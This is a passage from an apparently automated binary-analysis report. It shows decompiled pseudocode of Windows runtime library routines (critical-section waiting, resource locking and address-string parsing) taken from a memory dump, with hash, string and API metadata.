                                                                                                                                                      										asm("lock cmpxchg [edi], esi");
                                                                                                                                                      										__eflags = _t57 - _t71;
                                                                                                                                                      										if(_t57 == _t71) {
                                                                                                                                                      											break;
                                                                                                                                                      										}
                                                                                                                                                      										_t71 = _t57;
                                                                                                                                                      										__eflags = _t57;
                                                                                                                                                      										if(_t57 > 0) {
                                                                                                                                                      											continue;
                                                                                                                                                      										}
                                                                                                                                                      										break;
                                                                                                                                                      									}
                                                                                                                                                      									_t32 = _a4;
                                                                                                                                                      									__eflags = _t71;
                                                                                                                                                      								}
                                                                                                                                                      								if(__eflags != 0) {
                                                                                                                                                      									continue;
                                                                                                                                                      								} else {
                                                                                                                                                      									goto L19;
                                                                                                                                                      								}
                                                                                                                                                      							}
                                                                                                                                                      						}
                                                                                                                                                      						goto L38;
                                                                                                                                                      					}
                                                                                                                                                      					_t71 = _t71 | 0xffffffff;
                                                                                                                                                      					_t32 = 0;
                                                                                                                                                      					asm("lock cmpxchg [edx], ecx");
                                                                                                                                                      					__eflags = 0;
                                                                                                                                                      					if(0 != 0) {
                                                                                                                                                      						goto L4;
                                                                                                                                                      					} else {
                                                                                                                                                      						 *((intOrPtr*)(_t64 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                                                                                                                                      						return 1;
                                                                                                                                                      					}
                                                                                                                                                      				}
                                                                                                                                                      				L38:
                                                                                                                                                      			}



























                                                                                                                                                      APIs
                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009722F4
                                                                                                                                                      Strings
                                                                                                                                                      • RTL: Re-Waiting, xrefs: 00972328
                                                                                                                                                      • RTL: Resource at %p, xrefs: 0097230B
                                                                                                                                                      • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 009722FC
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000005.00000002.2218172040.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true
                                                                                                                                                      • Associated: 00000005.00000002.2218167906.00000000008F0000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000005.00000002.2218237266.00000000009E0000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000005.00000002.2218241028.00000000009F0000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000005.00000002.2218246476.00000000009F4000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000005.00000002.2218251764.00000000009F7000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000005.00000002.2218255269.0000000000A00000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000005.00000002.2218289035.0000000000A60000.00000040.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                      • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                      • API String ID: 885266447-871070163
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 51%
                                                                                                                                                      			E0093EC56(void* __ecx, void* __edx, intOrPtr* __edi, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                      				intOrPtr _v8;
                                                                                                                                                      				intOrPtr _v12;
                                                                                                                                                      				signed int _v24;
                                                                                                                                                      				intOrPtr* _v28;
                                                                                                                                                      				intOrPtr _v32;
                                                                                                                                                      				signed int _v36;
                                                                                                                                                      				intOrPtr _v40;
                                                                                                                                                      				short _v66;
                                                                                                                                                      				char _v72;
                                                                                                                                                      				void* __esi;
                                                                                                                                                      				intOrPtr _t38;
                                                                                                                                                      				intOrPtr _t39;
                                                                                                                                                      				signed int _t40;
                                                                                                                                                      				intOrPtr _t42;
                                                                                                                                                      				intOrPtr _t43;
                                                                                                                                                      				signed int _t44;
                                                                                                                                                      				void* _t46;
                                                                                                                                                      				intOrPtr _t48;
                                                                                                                                                      				signed int _t49;
                                                                                                                                                      				intOrPtr _t50;
                                                                                                                                                      				intOrPtr _t53;
                                                                                                                                                      				signed char _t67;
                                                                                                                                                      				void* _t72;
                                                                                                                                                      				intOrPtr _t77;
                                                                                                                                                      				intOrPtr* _t80;
                                                                                                                                                      				intOrPtr _t84;
                                                                                                                                                      				intOrPtr* _t85;
                                                                                                                                                      				void* _t91;
                                                                                                                                                      				void* _t92;
                                                                                                                                                      				void* _t93;
                                                                                                                                                      
                                                                                                                                                      				_t80 = __edi;
                                                                                                                                                      				_t75 = __edx;
                                                                                                                                                      				_t70 = __ecx;
                                                                                                                                                      				_t84 = _a4;
                                                                                                                                                      				if( *((intOrPtr*)(_t84 + 0x10)) == 0) {
                                                                                                                                                      					E0092DA92(__ecx, __edx, __eflags, _t84);
                                                                                                                                                      					_t38 =  *((intOrPtr*)(_t84 + 0x10));
                                                                                                                                                      				}
                                                                                                                                                      				_push(0);
                                                                                                                                                      				__eflags = _t38 - 0xffffffff;
                                                                                                                                                      				if(_t38 == 0xffffffff) {
                                                                                                                                                      					_t39 =  *0x9f793c; // 0x0
                                                                                                                                                      					_push(0);
                                                                                                                                                      					_push(_t84);
                                                                                                                                                      					_t40 = E009116C0(_t39);
                                                                                                                                                      				} else {
                                                                                                                                                      					_t40 = E0090F9D4(_t38);
                                                                                                                                                      				}
                                                                                                                                                      				_pop(_t85);
                                                                                                                                                      				__eflags = _t40;
                                                                                                                                                      				if(__eflags < 0) {
                                                                                                                                                      					_push(_t40);
                                                                                                                                                      					E00953915(_t67, _t70, _t75, _t80, _t85, __eflags);
                                                                                                                                                      					asm("int3");
                                                                                                                                                      					while(1) {
                                                                                                                                                      						L21:
                                                                                                                                                      						_t76 =  *[fs:0x18];
                                                                                                                                                      						_t42 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
                                                                                                                                                      						__eflags =  *(_t42 + 0x240) & 0x00000002;
                                                                                                                                                      						if(( *(_t42 + 0x240) & 0x00000002) != 0) {
                                                                                                                                                      							_v36 =  *(_t85 + 0x14) & 0x00ffffff;
                                                                                                                                                      							_v66 = 0x1722;
                                                                                                                                                      							_t71 =  *((intOrPtr*)(_t85 + 0xc));
                                                                                                                                                      							_t76 =  &_v72;
                                                                                                                                                      							_push( &_v72);
                                                                                                                                                      							_v28 = _t85;
                                                                                                                                                      							_v40 =  *((intOrPtr*)(_t85 + 4));
                                                                                                                                                      							_v32 =  *((intOrPtr*)(_t85 + 0xc));
                                                                                                                                                      							_push(0x10);
                                                                                                                                                      							_push(0x20402);
                                                                                                                                                      							E009101A4( *0x7ffe0382 & 0x000000ff);
                                                                                                                                                      						}
                                                                                                                                                      						while(1) {
                                                                                                                                                      							_t43 = _v8;
                                                                                                                                                      							_push(_t80);
                                                                                                                                                      							_push(0);
                                                                                                                                                      							__eflags = _t43 - 0xffffffff;
                                                                                                                                                      							if(_t43 == 0xffffffff) {
                                                                                                                                                      								_t71 =  *0x9f793c; // 0x0
                                                                                                                                                      								_push(_t85);
                                                                                                                                                      								_t44 = E00911F28(_t71);
                                                                                                                                                      							} else {
                                                                                                                                                      								_t44 = E0090F8CC(_t43);
                                                                                                                                                      							}
                                                                                                                                                      							__eflags = _t44 - 0x102;
                                                                                                                                                      							if(_t44 != 0x102) {
                                                                                                                                                      								__eflags = _t44;
                                                                                                                                                      								if(__eflags < 0) {
                                                                                                                                                      									_push(_t44);
                                                                                                                                                      									E00953915(_t67, _t71, _t76, _t80, _t85, __eflags);
                                                                                                                                                      									asm("int3");
                                                                                                                                                      									E00992306(_t85);
                                                                                                                                                      									__eflags = _t67 & 0x00000002;
                                                                                                                                                      									if((_t67 & 0x00000002) != 0) {
                                                                                                                                                      										_t7 = _t67 + 2; // 0x4
                                                                                                                                                      										_t72 = _t7;
                                                                                                                                                      										asm("lock cmpxchg [edi], ecx");
                                                                                                                                                      										__eflags = _t67 - _t67;
                                                                                                                                                      										if(_t67 == _t67) {
                                                                                                                                                      											E0093EC56(_t72, _t76, _t80, _t85);
                                                                                                                                                      										}
                                                                                                                                                      									}
                                                                                                                                                      									return 0;
                                                                                                                                                      								} else {
                                                                                                                                                      									__eflags = _v24;
                                                                                                                                                      									if(_v24 != 0) {
                                                                                                                                                      										 *((intOrPtr*)(_v12 + 0xf84)) = 0;
                                                                                                                                                      									}
                                                                                                                                                      									return 2;
                                                                                                                                                      								}
                                                                                                                                                      								goto L36;
                                                                                                                                                      							}
                                                                                                                                                      							_t77 =  *((intOrPtr*)(_t80 + 4));
                                                                                                                                                      							_push(_t67);
                                                                                                                                                      							_t46 = E00954FC0( *_t80, _t77, 0xff676980, 0xffffffff);
                                                                                                                                                      							_push(_t77);
                                                                                                                                                      							E00963F92(0x65, 1, "RTL: Enter Critical Section Timeout (%I64u secs) %d\n", _t46);
                                                                                                                                                      							_t48 =  *_t85;
                                                                                                                                                      							_t92 = _t91 + 0x18;
                                                                                                                                                      							__eflags = _t48 - 0xffffffff;
                                                                                                                                                      							if(_t48 == 0xffffffff) {
                                                                                                                                                      								_t49 = 0;
                                                                                                                                                      								__eflags = 0;
                                                                                                                                                      							} else {
                                                                                                                                                      								_t49 =  *((intOrPtr*)(_t48 + 0x14));
                                                                                                                                                      							}
                                                                                                                                                      							_t71 =  *((intOrPtr*)(_t85 + 0xc));
                                                                                                                                                      							_push(_t49);
                                                                                                                                                      							_t50 = _v12;
                                                                                                                                                      							_t76 =  *((intOrPtr*)(_t50 + 0x24));
                                                                                                                                                      							_push(_t85);
                                                                                                                                                      							_push( *((intOrPtr*)(_t85 + 0xc)));
                                                                                                                                                      							_push( *((intOrPtr*)(_t50 + 0x24)));
                                                                                                                                                      							E00963F92(0x65, 0, "RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu\n",  *((intOrPtr*)(_t50 + 0x20)));
                                                                                                                                                      							_t53 =  *_t85;
                                                                                                                                                      							_t93 = _t92 + 0x20;
                                                                                                                                                      							_t67 = _t67 + 1;
                                                                                                                                                      							__eflags = _t53 - 0xffffffff;
                                                                                                                                                      							if(_t53 != 0xffffffff) {
                                                                                                                                                      								_t71 =  *((intOrPtr*)(_t53 + 0x14));
                                                                                                                                                      								_a4 =  *((intOrPtr*)(_t53 + 0x14));
                                                                                                                                                      							}
                                                                                                                                                      							__eflags = _t67 - 2;
                                                                                                                                                      							if(_t67 > 2) {
                                                                                                                                                      								__eflags = _t85 - 0x9f20c0;
                                                                                                                                                      								if(_t85 != 0x9f20c0) {
                                                                                                                                                      									_t76 = _a4;
                                                                                                                                                      									__eflags = _a4 - _a8;
                                                                                                                                                      									if(__eflags == 0) {
                                                                                                                                                      										E0099217A(_t71, __eflags, _t85);
                                                                                                                                                      									}
                                                                                                                                                      								}
                                                                                                                                                      							}
                                                                                                                                                      							_push("RTL: Re-Waiting\n");
                                                                                                                                                      							_push(0);
                                                                                                                                                      							_push(0x65);
                                                                                                                                                      							_a8 = _a4;
                                                                                                                                                      							E00963F92();
                                                                                                                                                      							_t91 = _t93 + 0xc;
                                                                                                                                                      							__eflags =  *0x7ffe0382;
                                                                                                                                                      							if( *0x7ffe0382 != 0) {
                                                                                                                                                      								goto L21;
                                                                                                                                                      							}
                                                                                                                                                      						}
                                                                                                                                                      						goto L36;
                                                                                                                                                      					}
                                                                                                                                                      				} else {
                                                                                                                                                      					return _t40;
                                                                                                                                                      				}
                                                                                                                                                      				L36:
                                                                                                                                                      			}


































                                                                                                                                                      Strings
                                                                                                                                                      • RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 009724BD
                                                                                                                                                      • RTL: Re-Waiting, xrefs: 009724FA
                                                                                                                                                      • RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 0097248D
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000005.00000002.2218172040.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true
                                                                                                                                                      • Associated: 00000005.00000002.2218167906.00000000008F0000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000005.00000002.2218237266.00000000009E0000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000005.00000002.2218241028.00000000009F0000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000005.00000002.2218246476.00000000009F4000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000005.00000002.2218251764.00000000009F7000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000005.00000002.2218255269.0000000000A00000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000005.00000002.2218289035.0000000000A60000.00000040.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
                                                                                                                                                      • API String ID: 0-3177188983
                                                                                                                                                      • Opcode ID: bf889ee6526b5e04db1a6df24ec051e8f62332daa287468955fc5791fbecdb26
                                                                                                                                                      • Instruction ID: de123f56b8b9317c40485bac626a5db3d158d5a5df3137b3a6874b3cedfed3e7
                                                                                                                                                      • Opcode Fuzzy Hash: bf889ee6526b5e04db1a6df24ec051e8f62332daa287468955fc5791fbecdb26
                                                                                                                                                      • Instruction Fuzzy Hash: 9341E771604204ABDB20DB68CC85FAA77BDEF84720F20CA05F5599B2D1D775E9418B60
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E0094FCC9(signed short* _a4, char _a7, signed short** _a8, intOrPtr _a12) {
                                                                                                                                                      				signed int _v8;
                                                                                                                                                      				signed int _v12;
                                                                                                                                                      				signed int _v16;
                                                                                                                                                      				signed int _v20;
                                                                                                                                                      				signed int _v24;
                                                                                                                                                      				signed int _v28;
                                                                                                                                                      				signed int _t105;
                                                                                                                                                      				void* _t110;
                                                                                                                                                      				char _t114;
                                                                                                                                                      				short _t115;
                                                                                                                                                      				void* _t118;
                                                                                                                                                      				signed short* _t119;
                                                                                                                                                      				short _t120;
                                                                                                                                                      				char _t122;
                                                                                                                                                      				void* _t127;
                                                                                                                                                      				void* _t130;
                                                                                                                                                      				signed int _t136;
                                                                                                                                                      				intOrPtr _t143;
                                                                                                                                                      				signed int _t158;
                                                                                                                                                      				signed short* _t164;
                                                                                                                                                      				signed int _t167;
                                                                                                                                                      				void* _t170;
                                                                                                                                                      
                                                                                                                                                      				_t158 = 0;
                                                                                                                                                      				_t164 = _a4;
                                                                                                                                                      				_v20 = 0;
                                                                                                                                                      				_v24 = 0;
                                                                                                                                                      				_v8 = 0;
                                                                                                                                                      				_v12 = 0;
                                                                                                                                                      				_v16 = 0;
                                                                                                                                                      				_v28 = 0;
                                                                                                                                                      				_t136 = 0;
                                                                                                                                                      				while(1) {
                                                                                                                                                      					_t167 =  *_t164 & 0x0000ffff;
                                                                                                                                                      					if(_t167 == _t158) {
                                                                                                                                                      						break;
                                                                                                                                                      					}
                                                                                                                                                      					_t118 = _v20 - _t158;
                                                                                                                                                      					if(_t118 == 0) {
                                                                                                                                                      						if(_t167 == 0x3a) {
                                                                                                                                                      							if(_v12 > _t158 || _v8 > _t158) {
                                                                                                                                                      								break;
                                                                                                                                                      							} else {
                                                                                                                                                      								_t119 =  &(_t164[1]);
                                                                                                                                                      								if( *_t119 != _t167) {
                                                                                                                                                      									break;
                                                                                                                                                      								}
                                                                                                                                                      								_t143 = 2;
                                                                                                                                                      								 *((short*)(_a12 + _t136 * 2)) = 0;
                                                                                                                                                      								_v28 = 1;
                                                                                                                                                      								_v8 = _t143;
                                                                                                                                                      								_t136 = _t136 + 1;
                                                                                                                                                      								L47:
                                                                                                                                                      								_t164 = _t119;
                                                                                                                                                      								_v20 = _t143;
                                                                                                                                                      								L14:
                                                                                                                                                      								if(_v24 == _t158) {
                                                                                                                                                      									L19:
                                                                                                                                                      									_t164 =  &(_t164[1]);
                                                                                                                                                      									_t158 = 0;
                                                                                                                                                      									continue;
                                                                                                                                                      								}
                                                                                                                                                      								if(_v12 == _t158) {
                                                                                                                                                      									if(_v16 > 4) {
                                                                                                                                                      										L29:
                                                                                                                                                      										return 0xc000000d;
                                                                                                                                                      									}
                                                                                                                                                      									_t120 = E0094EE02(_v24, _t158, 0x10);
                                                                                                                                                      									_t170 = _t170 + 0xc;
                                                                                                                                                      									 *((short*)(_a12 + _t136 * 2)) = _t120;
                                                                                                                                                      									_t136 = _t136 + 1;
                                                                                                                                                      									goto L19;
                                                                                                                                                      								}
                                                                                                                                                      								if(_v16 > 3) {
                                                                                                                                                      									goto L29;
                                                                                                                                                      								}
                                                                                                                                                      								_t122 = E0094EE02(_v24, _t158, 0xa);
                                                                                                                                                      								_t170 = _t170 + 0xc;
                                                                                                                                                      								if(_t122 > 0xff) {
                                                                                                                                                      									goto L29;
                                                                                                                                                      								}
                                                                                                                                                      								 *((char*)(_v12 + _t136 * 2 + _a12 - 1)) = _t122;
                                                                                                                                                      								goto L19;
                                                                                                                                                      							}
                                                                                                                                                      						}
                                                                                                                                                      						L21:
                                                                                                                                                      						if(_v8 > 7 || _t167 >= 0x80) {
                                                                                                                                                      							break;
                                                                                                                                                      						} else {
                                                                                                                                                      							if(E0094685D(_t167, 4) == 0) {
                                                                                                                                                      								if(E0094685D(_t167, 0x80) != 0) {
                                                                                                                                                      									if(_v12 > 0) {
                                                                                                                                                      										break;
                                                                                                                                                      									}
                                                                                                                                                      									_t127 = 1;
                                                                                                                                                      									_a7 = 1;
                                                                                                                                                      									_v24 = _t164;
                                                                                                                                                      									_v20 = 1;
                                                                                                                                                      									_v16 = 1;
                                                                                                                                                      									L36:
                                                                                                                                                      									if(_v20 == _t127) {
                                                                                                                                                      										goto L19;
                                                                                                                                                      									}
                                                                                                                                                      									_t158 = 0;
                                                                                                                                                      									goto L14;
                                                                                                                                                      								}
                                                                                                                                                      								break;
                                                                                                                                                      							}
                                                                                                                                                      							_a7 = 0;
                                                                                                                                                      							_v24 = _t164;
                                                                                                                                                      							_v20 = 1;
                                                                                                                                                      							_v16 = 1;
                                                                                                                                                      							goto L19;
                                                                                                                                                      						}
                                                                                                                                                      					}
                                                                                                                                                      					_t130 = _t118 - 1;
                                                                                                                                                      					if(_t130 != 0) {
                                                                                                                                                      						if(_t130 == 1) {
                                                                                                                                                      							goto L21;
                                                                                                                                                      						}
                                                                                                                                                      						_t127 = 1;
                                                                                                                                                      						goto L36;
                                                                                                                                                      					}
                                                                                                                                                      					if(_t167 >= 0x80) {
                                                                                                                                                      						L7:
                                                                                                                                                      						if(_t167 == 0x3a) {
                                                                                                                                                      							_t158 = 0;
                                                                                                                                                      							if(_v12 > 0 || _v8 > 6) {
                                                                                                                                                      								break;
                                                                                                                                                      							} else {
                                                                                                                                                      								_t119 =  &(_t164[1]);
                                                                                                                                                      								if( *_t119 != _t167) {
                                                                                                                                                      									_v8 = _v8 + 1;
                                                                                                                                                      									L13:
                                                                                                                                                      									_v20 = _t158;
                                                                                                                                                      									goto L14;
                                                                                                                                                      								}
                                                                                                                                                      								if(_v28 != 0) {
                                                                                                                                                      									break;
                                                                                                                                                      								}
                                                                                                                                                      								_v28 = _v8 + 1;
                                                                                                                                                      								_t143 = 2;
                                                                                                                                                      								_v8 = _v8 + _t143;
                                                                                                                                                      								goto L47;
                                                                                                                                                      							}
                                                                                                                                                      						}
                                                                                                                                                      						if(_t167 != 0x2e || _a7 != 0 || _v12 > 2 || _v8 > 6) {
                                                                                                                                                      							break;
                                                                                                                                                      						} else {
                                                                                                                                                      							_v12 = _v12 + 1;
                                                                                                                                                      							_t158 = 0;
                                                                                                                                                      							goto L13;
                                                                                                                                                      						}
                                                                                                                                                      					}
                                                                                                                                                      					if(E0094685D(_t167, 4) != 0) {
                                                                                                                                                      						_v16 = _v16 + 1;
                                                                                                                                                      						goto L19;
                                                                                                                                                      					}
                                                                                                                                                      					if(E0094685D(_t167, 0x80) != 0) {
                                                                                                                                                      						_v16 = _v16 + 1;
                                                                                                                                                      						if(_v12 > 0) {
                                                                                                                                                      							break;
                                                                                                                                                      						}
                                                                                                                                                      						_a7 = 1;
                                                                                                                                                      						goto L19;
                                                                                                                                                      					}
                                                                                                                                                      					goto L7;
                                                                                                                                                      				}
                                                                                                                                                      				 *_a8 = _t164;
                                                                                                                                                      				if(_v12 != 0) {
                                                                                                                                                      					if(_v12 != 3) {
                                                                                                                                                      						goto L29;
                                                                                                                                                      					}
                                                                                                                                                      					_v8 = _v8 + 1;
                                                                                                                                                      				}
                                                                                                                                                      				if(_v28 != 0 || _v8 == 7) {
                                                                                                                                                      					if(_v20 != 1) {
                                                                                                                                                      						if(_v20 != 2) {
                                                                                                                                                      							goto L29;
                                                                                                                                                      						}
                                                                                                                                                      						 *((short*)(_a12 + _t136 * 2)) = 0;
                                                                                                                                                      						L65:
                                                                                                                                                      						_t105 = _v28;
                                                                                                                                                      						if(_t105 != 0) {
                                                                                                                                                      							_t98 = (_t105 - _v8) * 2; // 0x11
                                                                                                                                                      							E00928980(_a12 + _t98 + 0x10, _a12 + _t105 * 2, _v8 - _t105 + _v8 - _t105);
                                                                                                                                                      							_t110 = 8;
                                                                                                                                                      							E0091DFC0(_a12 + _t105 * 2, 0, _t110 - _v8 + _t110 - _v8);
                                                                                                                                                      						}
                                                                                                                                                      						return 0;
                                                                                                                                                      					}
                                                                                                                                                      					if(_v12 != 0) {
                                                                                                                                                      						if(_v16 > 3) {
                                                                                                                                                      							goto L29;
                                                                                                                                                      						}
                                                                                                                                                      						_t114 = E0094EE02(_v24, 0, 0xa);
                                                                                                                                                      						_t170 = _t170 + 0xc;
                                                                                                                                                      						if(_t114 > 0xff) {
                                                                                                                                                      							goto L29;
                                                                                                                                                      						}
                                                                                                                                                      						 *((char*)(_v12 + _t136 * 2 + _a12)) = _t114;
                                                                                                                                                      						goto L65;
                                                                                                                                                      					}
                                                                                                                                                      					if(_v16 > 4) {
                                                                                                                                                      						goto L29;
                                                                                                                                                      					}
                                                                                                                                                      					_t115 = E0094EE02(_v24, 0, 0x10);
                                                                                                                                                      					_t170 = _t170 + 0xc;
                                                                                                                                                      					 *((short*)(_a12 + _t136 * 2)) = _t115;
                                                                                                                                                      					goto L65;
                                                                                                                                                      				} else {
                                                                                                                                                      					goto L29;
                                                                                                                                                      				}
                                                                                                                                                      			}


























                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000005.00000002.2218172040.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true
                                                                                                                                                      • Associated: 00000005.00000002.2218167906.00000000008F0000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000005.00000002.2218237266.00000000009E0000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000005.00000002.2218241028.00000000009F0000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000005.00000002.2218246476.00000000009F4000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000005.00000002.2218251764.00000000009F7000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000005.00000002.2218255269.0000000000A00000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000005.00000002.2218289035.0000000000A60000.00000040.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: __fassign
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3965848254-0
                                                                                                                                                      • Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                                                                                                                      • Instruction ID: c5c6ff21687514e1d96d00d2caf9acf8297ec8c698c99a0c8ac3dff7d0cc2a40
                                                                                                                                                      • Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                                                                                                                      • Instruction Fuzzy Hash: A2919172D0021AEFDF24CF59C855AAFB7B8FF55309F24847AD445A72A2E7304A41CB91
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 80%
                                                                                                                                                      			E009CE9FF(void* __edx, signed int _a4, intOrPtr _a8, char _a12) {
                                                                                                                                                      				signed int _v5;
                                                                                                                                                      				int _v12;
                                                                                                                                                      				signed int _v16;
                                                                                                                                                      				char _v20;
                                                                                                                                                      				int _v24;
                                                                                                                                                      				signed int _v28;
                                                                                                                                                      				int _v32;
                                                                                                                                                      				signed int _v36;
                                                                                                                                                      				signed int _v40;
                                                                                                                                                      				signed int _v44;
                                                                                                                                                      				signed int _v48;
                                                                                                                                                      				intOrPtr _v52;
                                                                                                                                                      				char _v60;
                                                                                                                                                      				signed int _v64;
                                                                                                                                                      				char _v68;
                                                                                                                                                      				intOrPtr _v72;
                                                                                                                                                      				intOrPtr _v76;
                                                                                                                                                      				intOrPtr _v80;
                                                                                                                                                      				intOrPtr _v84;
                                                                                                                                                      				void _v96;
                                                                                                                                                      				char _v100;
                                                                                                                                                      				void _v140;
                                                                                                                                                      				char _v144;
                                                                                                                                                      				intOrPtr _v160;
                                                                                                                                                      				intOrPtr _v164;
                                                                                                                                                      				char _v172;
                                                                                                                                                      				char _v216;
                                                                                                                                                      				char _v220;
                                                                                                                                                      				void* __edi;
                                                                                                                                                      				void* __esi;
                                                                                                                                                      				void* _t231;
                                                                                                                                                      				signed char _t233;
                                                                                                                                                      				signed int _t237;
                                                                                                                                                      				signed int _t238;
                                                                                                                                                      				signed int _t244;
                                                                                                                                                      				short _t251;
                                                                                                                                                      				signed int _t253;
                                                                                                                                                      				signed int* _t254;
                                                                                                                                                      				signed int _t255;
                                                                                                                                                      				signed int _t257;
                                                                                                                                                      				signed int _t259;
                                                                                                                                                      				signed int _t260;
                                                                                                                                                      				signed int _t267;
                                                                                                                                                      				signed int _t271;
                                                                                                                                                      				intOrPtr _t281;
                                                                                                                                                      				signed int _t314;
                                                                                                                                                      				signed char _t316;
                                                                                                                                                      				signed int _t319;
                                                                                                                                                      				signed int _t322;
                                                                                                                                                      				signed int _t323;
                                                                                                                                                      				signed int _t326;
                                                                                                                                                      				signed int _t328;
                                                                                                                                                      				signed int _t330;
                                                                                                                                                      				signed int _t332;
                                                                                                                                                      				signed int _t334;
                                                                                                                                                      				int _t340;
                                                                                                                                                      				intOrPtr* _t341;
                                                                                                                                                      				signed int _t342;
                                                                                                                                                      				signed int _t343;
                                                                                                                                                      				signed int _t345;
                                                                                                                                                      				signed int _t347;
                                                                                                                                                      				signed int _t352;
                                                                                                                                                      				void* _t360;
                                                                                                                                                      				intOrPtr* _t370;
                                                                                                                                                      				intOrPtr _t371;
                                                                                                                                                      				intOrPtr* _t372;
                                                                                                                                                      
                                                                                                                                                      				_t360 = __edx;
                                                                                                                                                      				_t340 = 0;
                                                                                                                                                      				_t345 = 0xa;
                                                                                                                                                      				_v144 = 0;
                                                                                                                                                      				memset( &_v140, 0, _t345 << 2);
                                                                                                                                                      				_v20 = 0;
                                                                                                                                                      				_v220 = 0;
                                                                                                                                                      				E0091DFC0( &_v216, 0, 0x2c);
                                                                                                                                                      				_t371 = _a8;
                                                                                                                                                      				_t347 = 7;
                                                                                                                                                      				_v100 = 0;
                                                                                                                                                      				_t231 = memset( &_v96, 0, _t347 << 2);
                                                                                                                                                      				_t348 = 0;
                                                                                                                                                      				_v12 = 0;
                                                                                                                                                      				_v32 = 0;
                                                                                                                                                      				_v24 = 0;
                                                                                                                                                      				_v5 = _t231;
                                                                                                                                                      				if(_t371 != 0) {
                                                                                                                                                      					_v5 = 1;
                                                                                                                                                      				}
                                                                                                                                                      				_t370 = _a4;
                                                                                                                                                      				_t233 =  *(_t370 + 0xcc) >> 3;
                                                                                                                                                      				_t380 = _t233 & 0x00000001;
                                                                                                                                                      				if((_t233 & 0x00000001) != 0) {
                                                                                                                                                      					E009CE919(_t360, _t380, _t370 + 0x70, _t370 + 0x78, _t370 + 0x68);
                                                                                                                                                      				}
                                                                                                                                                      				_v52 =  *((intOrPtr*)(_t370 + 0x6c));
                                                                                                                                                      				_v16 =  *(_t370 + 0x80);
                                                                                                                                                      				if(_v5 != _t340) {
                                                                                                                                                      					_t42 = _t371 + 0x20; // 0x9cc2d6
                                                                                                                                                      					_v32 = _t42;
                                                                                                                                                      					_t44 = _t371 + 4; // 0x5bcd335e
                                                                                                                                                      					_t237 =  *_t44 & 0x0000ffff;
                                                                                                                                                      					_v24 = _t237;
                                                                                                                                                      					_t238 = _t237 + 0x48;
                                                                                                                                                      					__eflags = _t238;
                                                                                                                                                      					L12:
                                                                                                                                                      					_v28 = _t238;
                                                                                                                                                      					_t372 = E0091E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _v16);
                                                                                                                                                      					if(_t372 != _t340) {
                                                                                                                                                      						_t54 = _t372 + 0x48; // 0x48
                                                                                                                                                      						_t341 = _t54;
                                                                                                                                                      						_t244 = E009CE519(_t360, _v52, 0xc0000000, 1,  &_a12, 0x20000080,  &_v12);
                                                                                                                                                      						__eflags = _t244;
                                                                                                                                                      						_a4 = _t244;
                                                                                                                                                      						if(_t244 < 0) {
                                                                                                                                                      							L49:
                                                                                                                                                      							__eflags = _v12;
                                                                                                                                                      							if(_v12 != 0) {
                                                                                                                                                      								E0090F9F0(_v12);
                                                                                                                                                      							}
                                                                                                                                                      							L51:
                                                                                                                                                      							_t340 = 0;
                                                                                                                                                      							__eflags = 0;
                                                                                                                                                      							L52:
                                                                                                                                                      							if(_t372 != _t340) {
                                                                                                                                                      								E0091E025(_t348,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t340, _t372);
                                                                                                                                                      							}
